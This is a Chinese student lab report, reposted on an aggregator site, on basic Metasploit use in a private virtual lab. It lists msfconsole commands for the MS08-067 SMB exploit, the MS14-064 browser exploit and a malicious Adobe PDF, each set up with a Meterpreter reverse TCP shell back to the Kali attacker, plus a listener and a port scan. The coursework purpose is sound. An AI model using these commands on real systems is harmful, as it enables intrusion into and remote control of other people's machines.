码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用

时间:2020-04-30 23:16:52      阅读:69      评论:0      收藏:0      [点我收藏+]

标签:png   info   复习   电脑   内容   ever   spl   浏览器   实战   

2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用

一、实验目标与内容

1.实践目标

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

2.实践内容

(1)一个主动攻击实践,如ms08_067;
(2)一个针对浏览器的攻击,如ms11_050;
(3)一个针对客户端的攻击,如Adobe;
(4)成功应用任何一个辅助模块。

二、实践步骤

1、一个主动攻击实践

1-1、简介

ms08_067_netapi
攻击机:kali(192.168.137.128)
靶机:Windows Server 2003(192.168.137.148)

1-2、操作

启动msfconsole查找漏洞search ms08-067:
技术图片

use exploit/windows/smb/ms08_067_netapi选择该漏洞:
技术图片
选取payload并设置参数:
技术图片

输入exploit进行攻击
技术图片

2、一个针对浏览器的攻击

2-1、简介

ms14-064
攻击机:kali(192.168.137.128)
靶机:Windows XP(192.168.137.149)

2-2、操作

用search ms14-064查询一下针对该漏洞的攻击模块
技术图片

use exploit/windows/browser/ms14_064_ole_code_execution使用该模块:
用set payload windows/meterpreter/reverse_tcp设置payload
show options查看信息,并设置需要设置的参数。
技术图片

exploit攻击后会生成带有攻击性的URL,如图:
技术图片

在winxp上用ie浏览器打开:
技术图片

再回到kali 发现已经回连成功:
技术图片

3、一个针对客户端的攻击

3-1、简介

攻击机:kali(192.168.137.128)
靶机:Windows XP(192.168.137.149)

3-2、操作

msfconsole
use windows/fileformat/adobe_cooltype_sing //选择攻击模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.128 //攻击机 IP
set LPORT 5312
set FILENAME zlx5312.pdf //设置生成的pdf文件名
技术图片

exploit //发起攻击
生成zlx5312.pdf,装有虚拟增强功能的虚拟机可以直接复制至靶机上
技术图片

控制台中输入back退出当前模块,输入以下命令进入监听模块:
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.186.128 //攻击机 IP
set LPORT 5313
exploit
靶机中打开zlx5313.pdf文件,
kali中发现回连成功:
技术图片

4、成功应用任何一个辅助模块

4-1、简介

攻击机:kali(192.168.137.128)
靶机:Windows XP(192.168.137.149)

4-2、操作

search portscan # 搜索端口相关的漏洞
技术图片

use auxiliary/scanner/portscan/ack # 使用漏洞
show options #显示设置
设置参数,并进行扫描:
技术图片

三、实验中遇到的问题

问题:输入exploit/run/其他操作后,无反应/运行失败。
(1)如下图,这是由于虚拟机所用系统版本造成的,把中文版换英文版后就可以进行了。
技术图片
(2)如下图,未知原因就是攻击不成功,多次重试后攻击成功。
技术图片
(3)如下图,设置参数进行扫描毫无反应,没有任何回馈,未知解决方案
技术图片

四、问题回答

(1)用自己的话解释什么是exploit,payload,encode.
exploit:利用系统、程序或服务的漏洞对靶机攻击的过程。
payload:有效载荷,是攻击方想要执行的代码
encode:对恶意代码进行伪装,使其不被靶机发现,从而达到攻击的目的。
(2)离实战还缺些什么技术或步骤?
一缺信息来源,这主要表现在信息收集渠道上,实战中靶机的各种信息需要我们自行获取,不可能像实验中这样,干脆是自己安装的。
二缺操作方式,连英文中文版本的差异都会造成某些漏洞攻击无法生效,更别说操作系统代代更新,我们会用的未必是靶机会被成功攻击的。

五、实验收获与感想

本次实验在流程上可以说非常简单,操作上没有太大难度。
实验中出现的问题,无论是否解决我都可以预料到是虚拟机/电脑的问题而不是操作的失误,之前实验中有时会遇到一些无法理解的知识点,本次实验却几乎没有遇到,这次实验可以说是一个实践的过程,按照课程内容完成即可。
我在此次实验中掌握metasploit的基本应用方式,理解了重点常用的三种攻击方式的思路,复习了相关课程内容,收益匪浅。

2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用

标签:png   info   复习   电脑   内容   ever   spl   浏览器   实战   

原文地址:https://www.cnblogs.com/20175312-tgy/p/12811210.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!